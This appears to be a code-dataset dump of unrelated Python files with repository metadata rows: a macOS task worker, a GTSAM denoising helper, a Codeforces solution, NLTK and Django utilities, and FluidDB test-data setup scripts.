      stdout = file(os.path.join(cwd, 'stdout'), 'w')
      stdout.write('No stdout.')
      stdout.flush()
      stdout.close()
      stdout = file(os.path.join(cwd, 'stdout'), 'rb')

    try:
      stderr = file(os.path.join(cwd, 'stderr'), 'rb')
    except IOError, e:
      logging.error('stderr was not written.')
      stderr = file(os.path.join(cwd, 'stderr'), 'w')
      stderr.write('No stderr.')
      stderr.flush()
      stderr.close()
      stderr = file(os.path.join(cwd, 'stderr'), 'rb')

    try:
      result_metadata_file = file(os.path.join(cwd, 'result_metadata'), 'r')
      result_metadata = json.loads(result_metadata_file.read().decode('utf-8'))
    except (IOError, ValueError):
      # A missing or malformed result_metadata file is not an error.
      result_metadata = None

    return (ret, stdout, stderr, execution_time, result_metadata)

  def DownloadAndStageFiles(self, files):
    logging.info('Not staging files: %s', files)
    # TODO: Stage files.

  def DownloadAndInstallPackages(self, packages, tmpdir):
    # TODO(jeff.carollo): Create a package cache if things take off.
    for package in packages:
      attempts = 0
      while True:
        try:
          # TODO(jeff.carollo): Put package cache code here.
          if self.use_cache_:
            self.package_cache_.CopyToDirectory(
                package, tmpdir.GetTmpDir(),
                package_installer.DownloadAndInstallPackage)
          else:
            package_installer.DownloadAndInstallPackage(
                package['name'], package['version'],
                tmpdir.GetTmpDir())
          break
        except urllib2.HTTPError, e:
          logging.error('Got HTTPError %d trying to grab package %s.%s: %s',
                        e.code, package['name'], package['version'], e)
          raise MrTaskmanUnrecoverableHttpError(e)
        except (urllib2.URLError, httplib.IncompleteRead,
                httplib.BadStatusLine, httplib.HTTPException), e:
          logging.error('Got URLError trying to grab package %s.%s: %s',
                        package['name'], package['version'], e)
          logging.info('Retrying in 10 seconds')
          attempts += 1
          # TODO(jeff.carollo): Figure out a robust way to do this.
          # Likely need to just try a few times to get around Internet blips
          # then mark task as failed for package reasons.
          if attempts < 10:
            time.sleep(10)
            continue
          else:
            logging.error('Failed to grab package after 10 attempts. Aborting.')
            raise MrTaskmanUnrecoverableHttpError(e)
        except IOError, e:
          logging.error('Got IOError trying to grab package %s.%s: %s',
                        package['name'], package['version'], e)
          raise MrTaskmanUnrecoverableHttpError(e)


def main(argv):
  try:
    argv = FLAGS(argv)
  except gflags.FlagsError, e:
    sys.stderr.write('%s\n' % e)
    sys.exit(1)

  # Set default socket timeout to 2 hours so that we catch missing timeouts.
  socket.setdefaulttimeout(2 * 60 * 60)

  if not FLAGS.log_filename:
    sys.stderr.write('Flag --log_filename is required.\n')
    sys.exit(-9)

  try:
    from third_party import portalocker
    log_file = file(FLAGS.log_filename, 'a+')
    portalocker.lock(log_file, portalocker.LOCK_EX | portalocker.LOCK_NB)
  except Exception, e:
    logging.exception(e)
    print 'Could not get exclusive lock.'
    sys.exit(-10)

  try:
    FORMAT = '%(asctime)-15s %(message)s'
    log_stream = split_stream.SplitStream(sys.stdout, log_file)
    logging.basicConfig(format=FORMAT, level=logging.DEBUG, stream=log_stream)
    macos_worker = MacOsWorker(FLAGS.worker_name, log_stream=log_stream)
    # Run forever, executing tasks from the server when available.
    macos_worker.PollAndExecute()
  finally:
    logging.shutdown()
    log_file.flush()
    portalocker.unlock(log_file)
    log_file.close()


if __name__ == '__main__':
  main(sys.argv)
| 34.501149 | 80 | 0.640259 | 1,775 | 15,008 | 5.287324 | 0.241127 | 0.012786 | 0.007459 | 0.010442 | 0.181779 | 0.141396 | 0.116782 | 0.09675 | 0.072882 | 0.072882 | 0 | 0.007213 | 0.260994 | 15,008 | 434 | 81 | 34.580645 | 0.838969 | 0.115005 | 0 | 0.271084 | 0 | 0 | 0.161537 | 0.009643 | 0 | 0 | 0 | 0.002304 | 0 | 0 | null | null | 0.012048 | 0.063253 | null | null | 0.003012 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
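The worker's `RunCommandRedirectingStdoutAndStderrWithTimeout` method polls a shell command until it exits or a deadline passes. A minimal, self-contained Python 3 sketch of that polling pattern (the `run_with_timeout` name is ours; the `-99` sentinel and 20 ms poll interval mirror the worker):

```python
import datetime
import subprocess
import time


def run_with_timeout(command, timeout, poll_interval=0.02):
    """Poll a shell command until it exits or the deadline passes.

    Returns the exit code, or -99 if the command was terminated
    because it exceeded the timeout (the worker's sentinel value).
    """
    deadline = datetime.datetime.now() + timeout
    process = subprocess.Popen(command, shell=True)
    ret = process.poll()
    while ret is None and datetime.datetime.now() < deadline:
        time.sleep(poll_interval)
        ret = process.poll()
    if ret is None:  # Deadline passed with the process still running.
        process.terminate()
        process.wait()
        ret = -99
    return ret
```

A busy-wait with a short sleep is simple and portable; `subprocess.run(..., timeout=...)` would be the modern alternative, but the polling form matches what the Python 2 worker does.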
353598ee45be370c07fb9e8b962ed07021b6f3e8 | 578 | py | Python | photospicker/exception/abstract_exception.py | l-vo/photos-picker | 6790e0411bb46e3206ca778dbd83ddd1d4f90f21 | [
"MIT"
] | null | null | null | photospicker/exception/abstract_exception.py | l-vo/photos-picker | 6790e0411bb46e3206ca778dbd83ddd1d4f90f21 | [
"MIT"
] | 52 | 2018-08-31T05:57:04.000Z | 2019-02-19T15:26:40.000Z | photospicker/exception/abstract_exception.py | l-vo/photos-picker | 6790e0411bb46e3206ca778dbd83ddd1d4f90f21 | [
"MIT"
] | null | null | null | class AbstractException(Exception):
    """Abstract exception for project"""

    def __init__(self, code, message):
        """
        Constructor

        :param int code: error code
        :param str message: error message
        """
        self._code = code
        self._message = message

    @property
    def code(self):
        """
        Getter for code

        :rtype: int
        """
        return self._code

    @property
    def message(self):  # pragma: no cover
        """
        Getter for message

        :rtype: str
        """
        return self._message
| 18.645161 | 41 | 0.520761 | 54 | 578 | 5.425926 | 0.425926 | 0.081911 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.384083 | 578 | 30 | 42 | 19.266667 | 0.823034 | 0.302768 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
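A quick sketch of how a concrete subclass would use this base class (the `PickerError` name and the example code/message are invented for illustration; the base class is restated so the snippet runs on its own):

```python
class AbstractException(Exception):
    """Abstract exception carrying an error code and message (as above)."""

    def __init__(self, code, message):
        self._code = code
        self._message = message

    @property
    def code(self):
        return self._code

    @property
    def message(self):
        return self._message


class PickerError(AbstractException):
    """Hypothetical concrete exception for a specific failure."""


try:
    raise PickerError(404, 'photo not found')
except AbstractException as e:
    print(e.code, e.message)  # -> 404 photo not found
```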
35361b12a2145f1e12f1ea888df65fc33ccd836c | 1,627 | py | Python | gtbook/linear.py | dellaert/nbdev_test | 793932be45ad75f0f1f0a03af6e4ae41e54b7857 | [
"Apache-2.0"
] | 5 | 2021-12-19T02:58:48.000Z | 2021-12-22T20:12:54.000Z | gtbook/linear.py | dellaert/nbdev_test | 793932be45ad75f0f1f0a03af6e4ae41e54b7857 | [
"Apache-2.0"
] | 2 | 2022-01-08T14:58:20.000Z | 2022-01-10T02:25:31.000Z | gtbook/linear.py | dellaert/nbdev_test | 793932be45ad75f0f1f0a03af6e4ae41e54b7857 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: linear.ipynb (unless otherwise specified).
__all__ = ['vv', 'denoising_MRF']
# Cell
import numpy as np
import gtsam
from gtsam import noiseModel
from .display import show
from typing import Dict
# Cell
def vv(keys_vectors: Dict[int, np.ndarray]):
    """Create a VectorValues from a dict"""
    result = gtsam.VectorValues()
    for j, v in keys_vectors.items():
        result.insert(j, v)
    return result
# Cell
def denoising_MRF(M: int, N: int, sigma=0.5, smoothness_sigma=0.5):
    """Create MxN MRF
    @returns graph and symbols used for rows.
    """
    row_symbols = [chr(ord('a') + row) for row in range(M)]
    keys = {(row, col): gtsam.symbol(row_symbols[row], col + 1)
            for row in range(M) for col in range(N)}
    rng = np.random.default_rng(42)
    data = rng.normal(loc=0, scale=sigma, size=(M, N, 1))
    data_model = noiseModel.Isotropic.Sigmas([sigma])
    smoothness_model = noiseModel.Isotropic.Sigmas([smoothness_sigma])
    I = np.eye(1, 1, dtype=float)
    zero = np.zeros((1, 1))
    graph = gtsam.GaussianFactorGraph()
    for row in range(M):
        for col in range(N):
            # add data terms:
            j = keys[(row, col)]
            graph.add(j, I, np.array(data[row, col]), data_model)
            # add smoothness terms:
            if col > 0:
                j1 = keys[(row, col - 1)]
                graph.add(j, I, j1, -I, zero, smoothness_model)
            if row > 0:
                j2 = keys[(row - 1, col)]
                graph.add(j, I, j2, -I, zero, smoothness_model)
    return graph, row_symbols
# Cell
| 29.053571 | 86 | 0.598648 | 237 | 1,627 | 4.029536 | 0.371308 | 0.036649 | 0.025131 | 0.040838 | 0.100524 | 0.058639 | 0.058639 | 0.058639 | 0.058639 | 0.058639 | 0 | 0.017692 | 0.270436 | 1,627 | 55 | 87 | 29.581818 | 0.786858 | 0.143823 | 0 | 0 | 1 | 0 | 0.011747 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0 | 0.151515 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
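Independent of GTSAM, the `denoising_MRF` above is just a sparse linear least-squares problem: one unary row per data term and one row per neighbouring pair, each weighted by the inverse sigma. A numpy-only sketch (the `denoise_grid` name and dense construction are ours, for illustration on tiny grids only):

```python
import numpy as np


def denoise_grid(data, sigma=0.5, smoothness_sigma=0.5):
    """Solve the denoising MRF as ordinary least squares.

    Rows of A: one per data term (x_ij ~ data_ij) and one per
    smoothness term (x_ij ~ neighbour), weighted by 1/sigma.
    """
    M, N = data.shape
    rows, rhs = [], []

    def unit(k):
        e = np.zeros(M * N)
        e[k] = 1.0
        return e

    for r in range(M):
        for c in range(N):
            k = r * N + c
            rows.append(unit(k) / sigma)            # data term
            rhs.append(data[r, c] / sigma)
            if c > 0:                               # horizontal smoothness
                rows.append((unit(k) - unit(k - 1)) / smoothness_sigma)
                rhs.append(0.0)
            if r > 0:                               # vertical smoothness
                rows.append((unit(k) - unit(k - N)) / smoothness_sigma)
                rhs.append(0.0)
    x, *_ = np.linalg.lstsq(np.array(rows), np.array(rhs), rcond=None)
    return x.reshape(M, N)
```

GTSAM's `GaussianFactorGraph` solves the same normal equations but exploits sparsity via variable elimination, which is what makes it scale past toy grids.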
3539dc514be01a0a70e432b9eaf2771e8b35648e | 899 | py | Python | _0697_div3/D_Cleaning_the_Phone.py | mingweihe/codeforces | 8395d68a09373775009b76dbde189ce5bbba58ae | [
"MIT"
] | null | null | null | _0697_div3/D_Cleaning_the_Phone.py | mingweihe/codeforces | 8395d68a09373775009b76dbde189ce5bbba58ae | [
"MIT"
] | null | null | null | _0697_div3/D_Cleaning_the_Phone.py | mingweihe/codeforces | 8395d68a09373775009b76dbde189ce5bbba58ae | [
"MIT"
] | null | null | null | def solve(n, m, A, B):
    ans = 0
    ones, twos = [], []
    for i in xrange(n):
        if B[i] == 1:
            ones.append(A[i])
        else:
            twos.append(A[i])
    ones.sort()
    twos.sort()
    i, j = len(ones) - 1, len(twos) - 1
    while m > 0 and (i >= 0 or j >= 0):
        # A single 1-point app already frees enough memory.
        if i >= 0 and ones[i] >= m:
            m -= ones[i]
            ans += 1
            break
        # Compare the two best 1-point apps against the best 2-point app.
        mem1, mem2 = float('-inf'), float('-inf')
        if i == 0:
            mem1 = ones[i]
        elif i > 0:
            mem1 = ones[i] + ones[i - 1]
        if j >= 0:
            mem2 = twos[j]
        if mem1 >= mem2:
            m -= ones[i]
            i -= 1
            ans += 1
        else:
            m -= mem2
            j -= 1
            ans += 2
    return -1 if m > 0 else ans


for _ in xrange(int(raw_input())):
    n, m = map(int, raw_input().split())
    A = map(int, raw_input().split())
    B = map(int, raw_input().split())
    print solve(n, m, A, B)
| 26.441176 | 49 | 0.404894 | 142 | 899 | 2.528169 | 0.260563 | 0.083565 | 0.122563 | 0.116992 | 0.270195 | 0 | 0 | 0 | 0 | 0 | 0 | 0.051233 | 0.413793 | 899 | 33 | 50 | 27.242424 | 0.629981 | 0 | 0 | 0.125 | 0 | 0 | 0.008899 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.03125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
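The greedy above repeatedly weighs the two cheapest-to-lose 1-point apps against the best 2-point app. A self-contained Python 3 re-statement for experimenting (the example inputs are ours, traced through the algorithm by hand):

```python
def solve(n, m, A, B):
    """Greedy from the script above, ported to Python 3.

    Minimises convenience points lost while freeing at least m memory;
    returns -1 when even removing everything is not enough.
    """
    ans = 0
    ones = sorted(A[i] for i in range(n) if B[i] == 1)
    twos = sorted(A[i] for i in range(n) if B[i] == 2)
    i, j = len(ones) - 1, len(twos) - 1
    while m > 0 and (i >= 0 or j >= 0):
        # A single 1-point app already frees enough memory.
        if i >= 0 and ones[i] >= m:
            return ans + 1
        # Best pair of 1-point apps (or single, if only one remains).
        mem1 = ones[i] + (ones[i - 1] if i > 0 else 0) if i >= 0 else float('-inf')
        mem2 = twos[j] if j >= 0 else float('-inf')
        if mem1 >= mem2:
            m -= ones[i]
            i -= 1
            ans += 1
        else:
            m -= mem2
            j -= 1
            ans += 2
    return -1 if m > 0 else ans


print(solve(5, 7, [5, 3, 2, 1, 4], [2, 1, 1, 2, 1]))  # -> 2
```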
354187da39692ce916dbf65d6fc9ecbdceb76905 | 239 | py | Python | pythonScript.py | qinenergy/QinBox | 9047d1fc6b7f1796820f13aabc1d7fe20cf8f34d | [
"MIT"
] | null | null | null | pythonScript.py | qinenergy/QinBox | 9047d1fc6b7f1796820f13aabc1d7fe20cf8f34d | [
"MIT"
] | null | null | null | pythonScript.py | qinenergy/QinBox | 9047d1fc6b7f1796820f13aabc1d7fe20cf8f34d | [
"MIT"
] | null | null | null | """
Lite install of NLTK resources.
"""
import nltk

dler = nltk.downloader.Downloader()
dler._update_index()
# Trick the index into treating panlex_lite as if it were already installed.
dler._status_cache['panlex_lite'] = 'installed'
dler.download('all')
| 26.555556 | 113 | 0.761506 | 34 | 239 | 5.176471 | 0.676471 | 0.113636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112971 | 239 | 8 | 114 | 29.875 | 0.830189 | 0.380753 | 0 | 0 | 0 | 0 | 0.164286 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3544ad58108f77d2815d664fdbba023d8958f9ac | 354 | py | Python | opticmedian/utils/file_reader.py | QuicqDev/OpticRescue | f857e3b770f43958f1d687f164ea896aa5390482 | [
"MIT"
] | 2 | 2021-08-09T01:35:06.000Z | 2021-08-09T01:37:05.000Z | opticmedian/utils/file_reader.py | QuicqDev/OpticRescue | f857e3b770f43958f1d687f164ea896aa5390482 | [
"MIT"
] | 8 | 2021-08-07T15:27:48.000Z | 2021-09-05T18:24:29.000Z | opticmedian/utils/file_reader.py | ASH1998/OpticRescue | f857e3b770f43958f1d687f164ea896aa5390482 | [
"MIT"
] | 1 | 2021-08-09T01:37:23.000Z | 2021-08-09T01:37:23.000Z | """
class to read files in specific ways
"""
import glob
import random


class Filer:
    """
    read files
    """

    def __init__(self, file_path):
        self.path = file_path

    def get_random_iter(self):
        """
        Return the files matching the path pattern, with their count.
        """
        file_iter = glob.glob(self.path)
        nb_files = len(file_iter)
        return file_iter, nb_files
| 13.615385 | 50 | 0.677966 | 55 | 354 | 4.127273 | 0.454545 | 0.105727 | 0.105727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003559 | 0.206215 | 354 | 25 | 51 | 14.16 | 0.80427 | 0.211864 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.222222 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
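The `Filer` pattern above boils down to a `glob` call plus a count. A small self-contained demonstration against throwaway files (the file names and the re-stated class are ours):

```python
import glob
import os
import tempfile


class Filer:
    """Re-statement of the class above for a runnable demo."""

    def __init__(self, file_path):
        self.path = file_path

    def get_random_iter(self):
        files = glob.glob(self.path)
        return files, len(files)


# Create a few throwaway files and glob only the .txt ones back.
with tempfile.TemporaryDirectory() as tmp:
    for name in ('a.txt', 'b.txt', 'c.log'):
        open(os.path.join(tmp, name), 'w').close()
    files, count = Filer(os.path.join(tmp, '*.txt')).get_random_iter()
    print(count)  # -> 2
```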
35468d2fd3afa4235fa24ef45b8d2a4fc954d35d | 891 | py | Python | WeatherStationSensorsReader/controllers/wind_measurement_controller.py | weather-station-project/weather-station-sensors-reader | cda7902ee382248b41d14b9a2c0543817decbb4a | [
"MIT"
] | null | null | null | WeatherStationSensorsReader/controllers/wind_measurement_controller.py | weather-station-project/weather-station-sensors-reader | cda7902ee382248b41d14b9a2c0543817decbb4a | [
"MIT"
] | null | null | null | WeatherStationSensorsReader/controllers/wind_measurement_controller.py | weather-station-project/weather-station-sensors-reader | cda7902ee382248b41d14b9a2c0543817decbb4a | [
"MIT"
] | null | null | null | from controllers.controller import Controller
from dao.wind_measurement_dao import WindMeasurementDao
from sensors.wind_measurement_sensor import WindMeasurementSensor


class WindMeasurementController(Controller):
    """Represents the controller with the wind measurement sensor and DAO."""

    def __init__(self, anemometer_port_number, server, database, user, password):
        super(WindMeasurementController, self).__init__(
            sensor=WindMeasurementSensor(anemometer_port_number=anemometer_port_number),
            dao=WindMeasurementDao(server=server,
                                   database=database,
                                   user=user,
                                   password=password))
| 59.4 | 132 | 0.560045 | 64 | 891 | 7.515625 | 0.4375 | 0.093555 | 0.12474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.393939 | 891 | 14 | 133 | 63.642857 | 0.890741 | 0.074074 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.2 | 0.3 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
3547f355d42e86cac54a2fa19887cfc08f3e0eb5 | 984 | py | Python | dashboard/migrations/0005_usercacherefreshtime.py | Wassaf-Shahzad/micromasters | b1340a8c233499b1d8d22872a6bc1fe7f49fd323 | [
"BSD-3-Clause"
] | 32 | 2016-03-25T01:03:13.000Z | 2022-01-15T19:35:42.000Z | dashboard/migrations/0005_usercacherefreshtime.py | Wassaf-Shahzad/micromasters | b1340a8c233499b1d8d22872a6bc1fe7f49fd323 | [
"BSD-3-Clause"
] | 4,858 | 2016-03-03T13:48:30.000Z | 2022-03-29T22:09:51.000Z | dashboard/migrations/0005_usercacherefreshtime.py | umarmughal824/micromasters | ea92d3bcea9be4601150fc497302ddacc1161622 | [
"BSD-3-Clause"
] | 20 | 2016-08-18T22:07:44.000Z | 2021-11-15T13:35:35.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.9.10 on 2016-11-04 21:12
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('dashboard', '0004_switch_jsonfield'),
]
operations = [
migrations.CreateModel(
name='UserCacheRefreshTime',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('enrollment', models.DateTimeField(null=True)),
('certificate', models.DateTimeField(null=True)),
('current_grade', models.DateTimeField(null=True)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 33.931034 | 118 | 0.644309 | 103 | 984 | 5.990291 | 0.61165 | 0.038898 | 0.111831 | 0.13128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027815 | 0.232724 | 984 | 28 | 119 | 35.142857 | 0.789404 | 0.069106 | 0 | 0 | 1 | 0 | 0.100767 | 0.023001 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.190476 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
35489b42960c3642fb09f7d87e33db297be3e58b | 2,651 | py | Python | fluiddb/scripts/testing.py | fluidinfo/fluiddb | b5a8c8349f3eaf3364cc4efba4736c3e33b30d96 | [
"Apache-2.0"
] | 3 | 2021-05-10T14:41:30.000Z | 2021-12-16T05:53:30.000Z | fluiddb/scripts/testing.py | fluidinfo/fluiddb | b5a8c8349f3eaf3364cc4efba4736c3e33b30d96 | [
"Apache-2.0"
] | null | null | null | fluiddb/scripts/testing.py | fluidinfo/fluiddb | b5a8c8349f3eaf3364cc4efba4736c3e33b30d96 | [
"Apache-2.0"
] | 2 | 2018-01-24T09:03:21.000Z | 2021-06-25T08:34:54.000Z | import logging

from fluiddb.data.store import getMainStore
from fluiddb.exceptions import FeatureError
from fluiddb.model.namespace import NamespaceAPI
from fluiddb.model.tag import TagAPI
from fluiddb.model.user import UserAPI, getUser


TESTING_DATA = {
    u'users': [
        u'testuser1',
        u'testuser2'],
    u'namespaces': [
        u'fluiddb/testing',
        u'fluiddb/testing/testing',
        u'testuser1/testing',
        u'testuser1/testing/testing',
        u'testuser2/testing',
        u'testuser2/testing/testing'],
    u'tags': [
        u'fluiddb/testing/test1',
        u'fluiddb/testing/test2',
        u'testuser1/testing/test1',
        u'testuser1/testing/test2',
        u'testuser2/testing/test1',
        u'testuser2/testing/test2']
}


def prepareForTesting():
    """
    Create a set of L{User}s, L{Namespace}s and L{Tag}s for testing purposes.
    """
    admin = getUser(u'fluiddb')
    logging.info('Creating testing users.')
    UserAPI().create([(username, 'secret', u'Test user', u'test@example.com')
                      for username in TESTING_DATA[u'users']])
    logging.info('Creating testing namespaces.')
    NamespaceAPI(admin).create([(namespace, u'Used for testing purposes.')
                                for namespace in TESTING_DATA[u'namespaces']])
    logging.info('Creating testing tags.')
    TagAPI(admin).create([(tag, u'Used for testing purposes.')
                          for tag in TESTING_DATA[u'tags']])
    getMainStore().commit()


def removeTestingData():
    """
    Delete L{User}s, L{Namespace}s and L{Tag}s used for testing purposes.
    """
    admin = getUser(u'fluiddb')
    logging.info('Deleting testing tags.')
    result = TagAPI(admin).get(TESTING_DATA[u'tags'])
    if result:
        TagAPI(admin).delete(result.keys())
    logging.info('Deleting testing namespaces.')
    result = NamespaceAPI(admin).get(TESTING_DATA[u'namespaces'])
    # We must delete namespaces one by one, otherwise we'll get NotEmptyError.
    for path in sorted(result.keys(), reverse=True):
        NamespaceAPI(admin).delete([path])
    logging.info('Deleting testing users.')
    result = UserAPI().get(TESTING_DATA[u'users'])
    if result:
        for username in result:
            path = '%s/private' % username
            try:
                NamespaceAPI(admin).delete([path])
            except FeatureError:
                # FIXME This is a bit crap, but it's faster than checking to
                # see if the namespace exists before attempting to delete it.
                continue
    if result:
        UserAPI().delete(result.keys())
    getMainStore().commit()
| 33.987179 | 78 | 0.629951 | 318 | 2,651 | 5.22956 | 0.27044 | 0.046302 | 0.050511 | 0.030667 | 0.144318 | 0.120265 | 0.088996 | 0.088996 | 0.088996 | 0.030066 | 0 | 0.008012 | 0.246699 | 2,651 | 77 | 79 | 34.428571 | 0.824737 | 0.126745 | 0 | 0.152542 | 0 | 0 | 0.255916 | 0.09071 | 0 | 0 | 0 | 0.012987 | 0 | 1 | 0.033898 | false | 0 | 0.101695 | 0 | 0.135593 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |